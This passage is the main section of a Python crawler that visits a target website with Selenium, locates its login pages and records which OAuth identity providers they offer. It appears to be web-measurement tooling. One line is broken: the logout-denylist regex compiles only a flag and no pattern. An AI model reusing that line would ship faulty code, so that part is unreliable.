= True 634 | SITE = '' 635 | MAX = 10 636 | 637 | USER_AGENT = f'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0' 638 | 639 | # Regex to avoid requesting URLs that might cause a logout 640 | LOGOUT_DENYLIST_REGEX = re.compile( 641 | 
642 |     re.IGNORECASE
643 | )
644 | 
645 | DENYLISTED_PATTERNS = [
646 |     '/hc/',
647 |     'https://support.', 'http://support.',
648 |     'https://help.', 'http://help.',
649 | 
650 | ]
651 | 
652 | DENYLISTED_DOMAINS = [
653 |     'doubleclick.net', 'googleadservices.com',
654 |     'google-analytics.com', 'googletagmanager.com',
655 |     'googletagservices.com', 'googleapis.com',
656 |     'googlesyndication.com', 'analytics.tiktok.com',
657 |     'gstatic.com'
658 | ]
659 | 
660 | # =============================================================================
661 | # =============================================================================
662 | # =================================== MAIN ====================================
663 | # =============================================================================
664 | # =============================================================================
665 | 
666 | if __name__ == '__main__':
667 |     # Arguments parsing
668 |     parser = argparse.ArgumentParser(
669 |         prog='idps-identification.py',
670 |         description='Find supported IdPs in a website\'s login page'
671 |     )
672 | 
673 |     parser.add_argument('-t', '--target', required=True, help='Target website')
674 |     parser.add_argument('-S', '--stats', default='stats', help='Statistics folder')
675 |     parser.add_argument('-R', '--reports', default='reports', help='Reports folder')
676 |     parser.add_argument('-l', '--logs', default='logs', help='Logs folder')
677 |     parser.add_argument('-L', '--links', help='File containing the login links')
678 |     parser.add_argument('-m', '--max', default=MAX, help=f'Maximum number of URLs to crawl (Default: {MAX})')
679 |     parser.add_argument('-N', '--no-headless', help='Do not use a headless browser', action='store_true')
680 |     parser.add_argument('-r', '--retest', help='Retest the URLs', action='store_true')
681 |     parser.add_argument('-d', '--debug', help='Enable debug mode', action='store_true')
682 | 
683 |     args = parser.parse_args()
684 | 
685 |     logger.setLevel(logging.INFO)
686 |     if args.debug:
687 |         logger.setLevel(logging.DEBUG)
688 | 
689 |     SITE = (
690 |         args.target
691 |         .strip()
692 |         .lower()
693 |         .replace('http://', '')
694 |         .replace('https://', '')
695 |     )
696 |     LOGS = args.logs
697 |     STATS = args.stats
698 |     REPORTS = args.reports
699 |     MAX = int(args.max)
700 |     HEADLESS = not args.no_headless
701 | 
702 |     # Create the folders if they do not exist
703 |     if not os.path.exists(LOGS):
704 |         os.makedirs(LOGS)
705 |     if not os.path.exists(STATS):
706 |         os.makedirs(STATS)
707 |     if not os.path.exists(REPORTS):
708 |         os.makedirs(REPORTS)
709 |     if not os.path.exists('html'):
710 |         os.makedirs('html')
711 | 
712 |     urls['site'] = SITE
713 | 
714 |     try:
715 |         # Get dictionaries from the files
716 |         if not args.retest:
717 |             get_dictionaries()
718 | 
719 |         # Set the options for the browser
720 |         browser = None
721 | 
722 |         options = webdriver.ChromeOptions()
723 |         options.add_argument(f'user-agent={USER_AGENT}')
724 | 
725 |         options.set_capability('goog:loggingPrefs', {'performance': 'ALL'})
726 | 
727 |         if HEADLESS:
728 |             options.add_argument('--headless')
729 |             options.add_argument("--disable-gpu")
730 | 
731 |         # Check if the site is already crawled
732 |         if urls['homepage'] == '':
733 |             logger.info('Crawling the site to collect the URLs to test')
734 | 
735 |         # Visit the homepage and follow redirects
736 |         if urls['homepage'] == '':
737 |             logger.info('Searching for the homepage')
738 | 
739 |             response = session.get(f'https://{SITE}/', timeout=30)
740 |             url = response.url
741 |             add_to_visited(url)
742 | 
743 |             homepage = url
744 |             urls['homepage'] = homepage
745 |             logger.info(f'found: {homepage}')
746 |         elif urls['homepage'] != '':
747 |             homepage = urls['homepage']
748 | 
749 |         if len(urls['login']) == 0:
750 |             # Note: remove this to search for more login pages when re-running the script
751 |             logger.info('Searching for the login page')
752 |             if browser is None:
753 |                 browser = webdriver.Chrome(options=options)
754 | 
755 |             # Clean the queue and visited_urls dictionaries
756 |             queue = {}
757 |             visited_urls = {}
758 | 
759 |             browser.get(urls['homepage'])
760 |             time.sleep(1)
761 | 
762 |             # with open(f'html/{SITE}-homepage.html', 'w') as f:
763 |             #     f.write(browser.page_source)
764 | 
765 |             # Get links from the homepage
766 |             links = get_links(browser.current_url, browser.page_source, only_internal=True)
767 | 
768 |             login_url = get_login_url(links)
769 |             if any(provider in login_url for provider in PROVIDERS):
770 |                 login_url = remove_query_string(login_url)
771 |             if login_url != '':
772 |                 if not any(get_template_url(login_url) == get_template_url(_url) for _url in urls['login']):
773 |                     urls['login'][login_url] = {}
774 |                     logger.info(f'found (1): {login_url}')
775 | 
776 |             for _url in links:
777 |                 add_to_queue(_url)
778 | 
779 |             # Check if the homepage itself contains login functionalities
780 |             if is_login_page(browser.current_url, browser.page_source):
781 |                 if not any(get_template_url(browser.current_url) == get_template_url(_url) for _url in urls['login']):
782 |                     urls['login'][browser.current_url] = {}
783 |                     logger.info(f'found (2): {browser.current_url}')
784 | 
785 |             # Crawl the site to find the *login page*
786 |             while should_continue() and len(urls['login']) == 0:
787 |                 url = get_url_from_queue()
788 | 
789 |                 if url is None or LOGOUT_DENYLIST_REGEX.search(url):
790 |                     continue
791 | 
792 |                 browser.get(url)
793 |                 add_to_visited(url)
794 | 
795 |                 # Get links from the page
796 |                 links = get_links(browser.current_url, browser.page_source, only_internal=True)
797 | 
798 |                 # TODO: here we should follow the redirects!
799 |                 login_url = get_login_url(links)
800 |                 if login_url != '':
801 |                     if not any(get_template_url(login_url) == get_template_url(_url) for _url in urls['login']):
802 |                         urls['login'][login_url] = {}
803 |                         logger.info(f'found (3): {login_url}')
804 | 
805 |                 for _url in links:
806 |                     add_to_queue(_url)
807 | 
808 |                 # Check if it's the login page
809 |                 if is_login_page(browser.current_url, browser.page_source):
810 |                     if not any(get_template_url(url) == get_template_url(_url) for _url in urls['login']):
811 |                         urls['login'][url] = {}
812 |                         logger.info(f'found (4): {url}')
813 |                     break
814 |             if len(urls['login']) == 0:
815 |                 logger.info('login page not found!')
816 |         # Visit the login page to search for the IdPs
817 |         elif len(urls['idps']) == 0:
818 |             # Note: remove this to search for more IdPs when re-running the script
819 |             logger.info(f'Searching for IdP OAuth links in {len(urls["login"])} pages')
820 |             if browser is None:
821 |                 browser = webdriver.Chrome(options=options)
822 | 
823 |             '''
824 |             1. Cycle through the login pages
825 |             2. If the page has already been dumped to disk: read it from the file
826 |             3. If the page is not on disk: fetch it from the web and dump it to a file
827 |             4. Get the IdPs from the page and add them to the urls['idps'] list if not already present (referencing the login page URL in the IdP entry)
828 |             '''
829 |             for login_url in urls['login']:
830 |                 if os.path.exists(f'html/{SITE}{url_to_filename(login_url)}.html'):
831 |                     logger.info('page retrieved from file')
832 |                     with open(f'html/{SITE}{url_to_filename(login_url)}.html', 'r') as f:
833 |                         html = f.read()
834 |                 else:
835 |                     logger.info('page retrieved from the web')
836 |                     browser.get(login_url)
837 |                     time.sleep(1.5)
838 | 
839 |                     html = browser.page_source
840 |                     with open(f'html/{SITE}{url_to_filename(login_url)}.html', 'w') as f:
841 |                         f.write(html)
842 | 
843 |                 links = get_links(login_url, html, only_internal=False) # Also collect external links
844 |                 for provider in PROVIDERS:
845 |                     # First get the login tag and xpath for the provider
846 |                     tag, xpath = get_oauth_tag(html, provider)
847 |                     if tag is not None:
848 |                         if provider not in urls['login'][login_url]:
849 |                             urls['login'][login_url][provider] = {}
850 |                         urls['login'][login_url][provider]['tag'] = tag
851 |                         if provider not in urls['idps']:
852 |                             urls['idps'].append(provider)
853 |                         logger.info(f'found {bcolors.OKGREEN}{provider}{bcolors.ENDC} tag')
854 |                     if xpath is not None:
855 |                         if provider not in urls['login'][login_url]:
856 |                             urls['login'][login_url][provider] = {}
857 |                         urls['login'][login_url][provider]['xpath'] = xpath
858 |                         if provider not in urls['idps']:
859 |                             urls['idps'].append(provider)
860 |                         logger.info(f'found {bcolors.OKGREEN}{provider}{bcolors.ENDC} xpath')
861 | 
862 |                     # Then search if there is also a direct OAuth link for this provider
863 |                     provider_oauth_link = get_oauth_link(links, provider=provider)
864 |                     if provider_oauth_link != '':
865 |                         if provider not in urls['login'][login_url]:
866 |                             urls['login'][login_url][provider] = {}
867 |                         urls['login'][login_url][provider]['url'] = provider_oauth_link
868 |                         if provider not in urls['idps']:
869 |                             urls['idps'].append(provider)
870 |                         logger.info(f'found {bcolors.OKGREEN}{provider}{bcolors.ENDC}: {provider_oauth_link}')
871 |                     else:
872 |                         # Try with links extracted from the raw source code (use the cached HTML, not the browser state)
873 |                         links = get_source_code_links(login_url, html)
874 |                         provider_oauth_link = get_oauth_link(links, provider=provider)
875 |                         if provider_oauth_link != '':
876 |                             if provider not in urls['login'][login_url]:
877 |                                 urls['login'][login_url][provider] = {}
878 |                             urls['login'][login_url][provider]['url'] = provider_oauth_link
879 |                             if provider not in urls['idps']:
880 |                                 urls['idps'].append(provider)
881 |                             logger.info(f'found {bcolors.OKGREEN}{provider}{bcolors.ENDC}: {provider_oauth_link}')
882 |         logger.info(f'Website crawled:\n{json.dumps(urls, indent=4)}')
883 |     except SystemExit as e:
884 |         sys.exit(e.code)
885 |     except (SSLError, NewConnectionError, MaxRetryError, ConnectionError, ReadTimeoutError, ReadTimeout):
886 |         logger.error(f'{SITE} timed out')
887 |     except KeyboardInterrupt:
888 |         logger.debug('KeyboardInterrupt received, exiting...')
889 |         sys.exit(1)
890 |     except:
891 |         logger.error(traceback.format_exc())
892 |         sys.exit(1)
893 |     finally:
894 |         save_dictionaries(SITE, LOGS)
895 |         if browser is not None:
896 |             browser.quit()
897 |         logger.info('All done!')
898 |         # Do not call sys.exit(0) here: it would override the exit codes set in the except blocks above
899 | 
--------------------------------------------------------------------------------